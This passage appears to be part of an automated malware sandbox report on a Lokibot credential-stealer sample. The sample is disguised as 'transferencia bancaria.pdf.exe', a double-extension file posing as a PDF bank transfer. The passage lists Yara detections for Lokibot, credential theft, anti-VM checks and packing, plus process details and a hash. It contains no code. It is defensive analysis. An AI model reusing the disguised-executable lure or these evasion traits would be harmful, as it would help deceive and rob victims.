                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Target ID:1
                                      Start time:12:29:59
                                      Start date:03/11/2022
                                      Path:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      Imagebase:0x5f0000
                                      File size:811008 bytes
                                      MD5 hash:355EFB2E1F7DD361F8E7CDA449A45EAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      Reputation:low

                                      No disassembly